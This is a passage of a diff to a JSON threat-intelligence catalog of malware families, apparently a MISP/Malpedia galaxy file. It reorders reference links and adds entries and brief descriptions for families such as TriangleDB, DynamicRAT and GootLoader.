"https://www.lacework.com/groundhog-botnet-rapidly-infecting-cloud/", + "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775", "https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/", - "http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html", + "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-a-string-array-in-xor-ddos/", + "https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/", + "https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html", + "https://www.lacework.com/groundhog-botnet-rapidly-infecting-cloud/", + "https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/", + "https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf", + "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/", + "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf", + "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf", "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html", - "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775" + "https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/", + "https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf", + "http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html", + "https://en.wikipedia.org/wiki/Xor_DDoS" ], "synonyms": [ "XORDDOS" @@ -7305,7 +7631,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.zuo_rat", - "https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/" + "https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/", + "https://www.mandiant.com/resources/blog/chinese-espionage-tactics" ], "synonyms": [], "type": [] @@ -7318,8 +7645,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/fas.acad", - "https://github.com/Hopfengetraenk/Fas-Disasm", - "https://www.forcepoint.com/blog/security-labs/autocad-malware-computer-aided-theft" + "https://www.forcepoint.com/blog/security-labs/autocad-malware-computer-aided-theft", + "https://github.com/Hopfengetraenk/Fas-Disasm" ], "synonyms": [ "Acad.Bursted", @@ -7361,9 +7688,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.lightspy", - "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/", + "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/", - "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf" + "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/" ], "synonyms": [], "type": [] @@ -7416,6 +7743,19 @@ "uuid": "25bff9ad-20dc-4746-a174-e54fcdd8f0c1", "value": "Postlo" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.triangledb", + "https://securelist.com/triangledb-triangulation-implant/110050/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "25754894-018b-4bed-aab6-c676fac23a77", + "value": "TriangleDB" + }, { "description": "The iOS malware that is installed over USB by osx.wirelurker", "meta": { @@ -7448,21 +7788,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind", - "https://research.checkpoint.com/malware-against-the-c-monoculture/", - "https://dissectingmalware.blogspot.com/2018/08/export-jratadwind-config-with-x32dbg.html", - "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/", - "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/", + "http://malware-traffic-analysis.net/2017/07/04/index.html", "https://www.zscaler.com/blogs/research/compromised-wordpress-sites-used-distribute-adwind-rat", - "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html", + "https://blogs.seqrite.com/evolution-of-jrat-java-malware/", + "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/", + "https://marcoramilli.com/2018/08/20/interesting-hidden-threat-since-years/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://dissectingmalware.blogspot.com/2018/08/export-jratadwind-config-with-x32dbg.html", + "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885", + "https://citizenlab.ca/2015/12/packrat-report/", + "https://research.checkpoint.com/malware-against-the-c-monoculture/", "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat", "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html", - "https://citizenlab.ca/2015/12/packrat-report/", - "https://blogs.seqrite.com/evolution-of-jrat-java-malware/", - "http://malware-traffic-analysis.net/2017/07/04/index.html", - "https://marcoramilli.com/2018/08/20/interesting-hidden-threat-since-years/", + "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885" + "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/" ], "synonyms": [ "AlienSpy", @@ -7495,10 +7835,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.banload", - "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf", - "https://colin.guru/index.php?title=Advanced_Banload_Analysis", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanDownloader%3AWin32%2FBanload", - "https://www.welivesecurity.com/wp-content/uploads/2015/05/CPL-Malware-in-Brasil-zx02m.pdf" + "https://www.welivesecurity.com/wp-content/uploads/2015/05/CPL-Malware-in-Brasil-zx02m.pdf", + "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf", + "https://colin.guru/index.php?title=Advanced_Banload_Analysis" ], "synonyms": [], "type": [] @@ -7524,8 +7864,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.crossrat", - "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", - "https://objective-see.com/blog/blog_0x28.html" + "https://objective-see.com/blog/blog_0x28.html", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" ], "synonyms": [ "Trupto" @@ -7535,6 +7875,21 @@ "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84", "value": "CrossRAT" }, + { + "description": "DynamicRAT is a malware that is spread via email attachments and compromises the security of computer systems. Once running on a device, DynamicRAT establishes a persistent presence and gives attackers complete remote control. Its features include sensitive data exfiltration, hardware control, remote action, and the ability to perform DDoS attacks. In addition, DynamicRAT uses evasion and persistence techniques to evade detection and analysis by security solutions.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.dynamicrat", + "https://gi7w0rm.medium.com/dynamicrat-a-full-fledged-java-rat-1a2dabb11694" + ], + "synonyms": [ + "DYNARAT" + ], + "type": [] + }, + "uuid": "28539c3d-89a4-4dd6-85f5-f4c95808c0b7", + "value": "DynamicRAT" + }, { "description": "EpicSplit RAT is a multiplatform Java RAT that is capable of running shell commands, downloading, uploading, and executing files, manipulating the file system, establishing persistence, taking screenshots, and manipulating keyboard and mouse events. EpicSplit is typically obfuscated with the commercial Allatori Obfuscator software. One unique feature of the malware is that TCP messages sent by EpicSplit RAT to its C2 are terminated with the string \"_packet_\" as a packet delimiter.", "meta": { @@ -7609,11 +7964,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat", - "https://research.checkpoint.com/malware-against-the-c-monoculture/", "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered", - "https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/", "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/", - "https://www.eff.org/files/2018/01/29/operation-manul.pdf" + "https://www.eff.org/files/2018/01/29/operation-manul.pdf", + "https://research.checkpoint.com/malware-against-the-c-monoculture/", + "https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/" ], "synonyms": [ "Jacksbot" @@ -7668,13 +8023,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qealler", - "https://www.herbiez.com/?p=1352", - "https://github.com/jeFF0Falltrades/Malware-Writeups/blob/master/Qealler/Qealler-Unloaded.pdf", - "https://www.securityinbits.com/malware-analysis/similarity-between-qealler-pyrogenic-variants-part-0x3/", - "https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer", "https://www.securityinbits.com/malware-analysis/unpacking/unpacking-pyrogenic-qealler-using-java-agent-part-0x2/", - "https://www.cyberark.com/threat-research-blog/qealler-the-silent-java-credential-thief/", - "https://www.securityinbits.com/malware-analysis/pyrogenic-infostealer-static-analysis-part-0x1/" + "https://www.herbiez.com/?p=1352", + "https://www.securityinbits.com/malware-analysis/similarity-between-qealler-pyrogenic-variants-part-0x3/", + "https://github.com/jeFF0Falltrades/Malware-Writeups/blob/master/Qealler/Qealler-Unloaded.pdf", + "https://www.securityinbits.com/malware-analysis/pyrogenic-infostealer-static-analysis-part-0x1/", + "https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer", + "https://www.cyberark.com/threat-research-blog/qealler-the-silent-java-credential-thief/" ], "synonyms": [ "Pyrogenic Infostealer" @@ -7690,8 +8045,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/", - "https://www.digitrustgroup.com/java-rat-qrat/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rats-and-spam-the-nodejs-qrat/", + "https://www.digitrustgroup.com/java-rat-qrat/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-qnode-rat-downloader-distributed-as-trump-video-scandal/" ], "synonyms": [ @@ -7707,8 +8062,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty", - "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/", - "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/" + "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/", + "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/" ], "synonyms": [], "type": [] @@ -7717,7 +8072,7 @@ "value": "Ratty" }, { - "description": "Sorillus is a Java-based multifunctional remote access trojan (RAT) which targets Linux, macOS and Windows operating systems. While it was first created in 2019, interest in the tool has increased considerably in 2022. Beginning on January 18, 2022, different obfuscated client versions of the tool started to be uploaded to VirusTotal. Sorillus' features are described in detail on its website (hxxps://sorillus[.]com). The tool supposedly costs 49.99€ for lifetime access but is currently available at a discounted 19.99€. Conveniently, the Sorillus can be purchased via a variety of cryptocurrencies. The tool's creator and distributor, a YouTube user known as \"Tapt\", asserts that the tool is able to collect the following information from its target:\r\n- HardwareID\r\n- Username\r\n- Country\r\n- Language\r\n- Webcam\r\n- Headless\r\n- Operating system\r\n- Client Version", + "description": "Sorillus is a Java-based multifunctional remote access trojan (RAT) which targets Linux, macOS and Windows operating systems. While it was first created in 2019, interest in the tool has increased considerably in 2022. Beginning on January 18, 2022, different obfuscated client versions of the tool started to be uploaded to VirusTotal. Sorillus' features are described in detail on its website (hxxps://sorillus[.]com). The tool supposedly costs 49.99\u20ac for lifetime access but is currently available at a discounted 19.99\u20ac. Conveniently, the Sorillus can be purchased via a variety of cryptocurrencies. The tool's creator and distributor, a YouTube user known as \"Tapt\", asserts that the tool is able to collect the following information from its target:\r\n- HardwareID\r\n- Username\r\n- Country\r\n- Language\r\n- Webcam\r\n- Headless\r\n- Operating system\r\n- Client Version", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.sorillus", @@ -7734,20 +8089,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.strrat", - "https://forensicitguy.github.io/strrat-attached-to-msi/", - "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/", + "https://www.fortinet.com/blog/threat-research/new-strrat-rat-phishing-campaign", + "https://www.jaiminton.com/reverse-engineering/strrat#", "https://any.run/cybersecurity-blog/strrat-malware-analysis-of-a-jar-archive/", + "https://twitter.com/MsftSecIntel/status/1395138347601854465", + "https://forensicitguy.github.io/strrat-attached-to-msi/", + "https://www.jaiminton.com/reverse-engineering/strrat", + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", + "https://resources.securityscorecard.com/cybersecurity/analyze-java-malware-strrat#page=1", "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf", "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain", - "https://www.fortinet.com/blog/threat-research/new-strrat-rat-phishing-campaign", - "https://www.jaiminton.com/reverse-engineering/strrat", - "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape", - "https://resources.securityscorecard.com/cybersecurity/analyze-java-malware-strrat#page=1", "https://www.gdatasoftware.com/blog/strrat-crimson", "https://isc.sans.edu/diary/rss/27798", - "https://www.jaiminton.com/reverse-engineering/strrat#", - "https://twitter.com/MsftSecIntel/status/1395138347601854465" + "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape" ], "synonyms": [], "type": [] @@ -7789,8 +8144,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak", "http://www.kahusecurity.com/posts/reflow_javascript_backdoor.html", - "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", - "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html" + "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html", + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk" ], "synonyms": [ "Orz" @@ -7805,11 +8160,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur", - "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", + "https://www.secureworks.com/research/threat-profiles/gold-niagara", "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", - "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor", - "https://www.secureworks.com/research/threat-profiles/gold-niagara" + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", + "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor" ], "synonyms": [], "type": [] @@ -7818,13 +8173,13 @@ "value": "Bateleur" }, { - "description": "• BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n• Creating a Run key in the Registry\r\n• Creating a RunOnce key in the Registry\r\n• Creating a persistent named scheduled task\r\n• BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n", + "description": "\u2022 BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n\u2022 Creating a Run key in the Registry\r\n\u2022 Creating a RunOnce key in the Registry\r\n\u2022 Creating a persistent named scheduled task\r\n\u2022 BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.bellhop", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", - "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf" + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" ], "synonyms": [], "type": [] @@ -7837,12 +8192,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cactustorch", - "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf", - "https://www.macnica.net/file/mpression_automobile.pdf", - "https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/", - "https://www.codercto.com/a/46729.html", "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/", - "https://github.com/mdsecactivebreach/CACTUSTORCH" + "https://github.com/mdsecactivebreach/CACTUSTORCH", + "https://www.codercto.com/a/46729.html", + "https://www.macnica.net/file/mpression_automobile.pdf", + "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf", + "https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/" ], "synonyms": [], "type": [] @@ -7894,12 +8249,12 @@ "value": "CukieGrab" }, { - "description": "Prevailion found this RAT written in JavaScript, which dynamically compiles an accompanying keylogger written in C# and uses a DGA für C&C.", + "description": "Prevailion found this RAT written in JavaScript, which dynamically compiles an accompanying keylogger written in C# and uses a DGA f\u00fcr C&C.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.darkwatchman", - "https://www.prevailion.com/darkwatchman-new-fileness-techniques/", - "https://securityintelligence.com/posts/hive00117-fileless-malware-delivery-eastern-europe/" + "https://securityintelligence.com/posts/hive00117-fileless-malware-delivery-eastern-europe/", + "https://www.prevailion.com/darkwatchman-new-fileness-techniques/" ], "synonyms": [], "type": [] @@ -7912,8 +8267,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.dnsrat", - "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/" ], "synonyms": [ "DNSbot" @@ -7958,16 +8313,16 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.evilnum", "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf", - "https://github.com/eset/malware-ioc/tree/master/evilnum", - "http://blog.nsfocus.net/agentvxapt-evilnum/", - "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", - "https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets", "http://www.pwncode.io/2018/05/javascript-based-bot-using-github-c.html", "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw", - "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/", + "https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets", + "https://securelist.com/deathstalker-mercenary-triumvirate/98177/", + "http://blog.nsfocus.net/agentvxapt-evilnum/", "https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html", "https://securelist.com/apt-trends-report-q3-2020/99204/", - "https://securelist.com/deathstalker-mercenary-triumvirate/98177/" + "https://github.com/eset/malware-ioc/tree/master/evilnum", + "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/", + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/" ], "synonyms": [], "type": [] @@ -7980,29 +8335,30 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.fakeupdates", - "https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://www.lac.co.jp/lacwatch/report/20220407_002923.html", - "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee", - "https://www.sentinelone.com/labs/socgholish-diversifies-and-expands-its-malware-staging-infrastructure-to-counter-defenders/", - "https://www.mandiant.com/resources/they-come-in-the-night-ransomware-deployment-trends", - "https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm", "https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/", - "https://www.digitalinformationworld.com/2022/04/threatening-redirect-web-service.html", - "https://blog.malwarebytes.com/threat-intelligence/2022/06/makemoney-malvertising-campaign-adds-fake-update-template/", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt", - "https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", "https://experience.mandiant.com/trending-evil/p/1", - "https://twitter.com/MsftSecIntel/status/1522690116979855360", - "https://killingthebear.jorgetesta.tech/actors/evil-corp", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.sentinelone.com/labs/socgholish-diversifies-and-expands-its-malware-staging-infrastructure-to-counter-defenders/", "https://expel.io/blog/incident-report-spotting-socgholish-wordpress-injection/", - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/", + "https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html", + "https://twitter.com/MsftSecIntel/status/1522690116979855360", + "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee", + "https://blog.malwarebytes.com/threat-intelligence/2022/06/makemoney-malvertising-campaign-adds-fake-update-template/", + "https://www.mandiant.com/resources/they-come-in-the-night-ransomware-deployment-trends", + "https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/", + "https://killingthebear.jorgetesta.tech/actors/evil-corp", + "https://www.lac.co.jp/lacwatch/report/20220407_002923.html", "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf", + "https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", "https://www.menlosecurity.com/blog/increase-in-attack-socgholish", "https://blog.sucuri.net/2022/08/socgholish-5-years-of-massive-website-infections.html", - "https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems" + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt", + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack", + "https://www.digitalinformationworld.com/2022/04/threatening-redirect-web-service.html" ], "synonyms": [ "FakeUpdate", @@ -8014,25 +8370,31 @@ "value": "FAKEUPDATES" }, { - "description": "", + "description": "According to PCrisk, they discovered GootLoader malware while examining legitimate but compromised websites (mainly websites managed using WordPress). It was found that GootLoader is used to infect computers with additional malware. Cybercriminals using GootLoader seek to trick users into unknowingly downloading and executing the malware by disguising it as a document or other file.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.gootloader", - "https://dinohacks.blogspot.com/2022/06/loading-gootloader.html", - "https://blogs.blackberry.com/en/2022/07/gootloader-from-seo-poisoning-to-multi-stage-downloader", - "https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf", - "https://www.esentire.com/web-native-pages/gootloader-unloaded", - "https://labs.sentinelone.com/gootloader-initial-access-as-a-service-platform-expands-its-search-for-high-value-targets/", - "https://www.mandiant.com/resources/blog/tracking-evolution-gootloader-operations", - "https://experience.mandiant.com/trending-evil/p/1", - "https://www.esentire.com/blog/gootloader-leads-to-cobalt-strike-and-hand-on-keyboard-activity", + "https://gootloader.wordpress.com/2023/01/05/gootloader-command-control/", "https://www.esentire.com/blog/gootloader-striking-with-a-new-infection-technique", - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", - "https://redcanary.com/blog/gootloader", - "https://threatresearch.ext.hp.com/tips-for-automating-ioc-extraction-from-gootloader-a-changing-javascript-malware/", - "https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/", + "https://experience.mandiant.com/trending-evil/p/1", + "https://web.archive.org/web/20230209123148/https://www.cybereason.com/hubfs/THREAT%20ALERT%20GootLoader%20-%20Large%20payload%20leading%20to%20compromise%20(BLOG).pdf", + "https://gootloader.wordpress.com/2023/01/05/what-is-gootloader/", + "https://www.kroll.com/en/insights/publications/cyber/deep-dive-gootloader-malware-infection-chain", + "https://www.esentire.com/blog/gootloader-leads-to-cobalt-strike-and-hand-on-keyboard-activity", + "https://www.mandiant.com/resources/blog/tracking-evolution-gootloader-operations", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/gootloader-why-your-legal-document-search-may-end-in-misery/", "https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/", - "https://community.riskiq.com/article/f5d5ed38" + "https://www.esentire.com/web-native-pages/gootloader-unloaded", + "https://community.riskiq.com/article/f5d5ed38", + "https://threatresearch.ext.hp.com/tips-for-automating-ioc-extraction-from-gootloader-a-changing-javascript-malware/", + "https://redcanary.com/blog/gootloader", + "https://www.reliaquest.com/blog/gootloader-infection-credential-access/", + "https://labs.sentinelone.com/gootloader-initial-access-as-a-service-platform-expands-its-search-for-high-value-targets/", + "https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf", + "https://dinohacks.blogspot.com/2022/06/loading-gootloader.html", + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/", + "https://blogs.blackberry.com/en/2022/07/gootloader-from-seo-poisoning-to-multi-stage-downloader" ], "synonyms": [], "type": [] @@ -8056,24 +8418,24 @@ "value": "grelos" }, { - "description": "GRIFFON is a lightweight JavaScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JavaScript, which allows the cybercriminals to understand the context of the infected workstation.", + "description": "GRIFFON is a lightweight JavaScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JavaScript, which allows the cybercriminals to understand the context of the infected workstation.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon", - "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", - "https://www.mandiant.com/resources/evolution-of-fin7", - 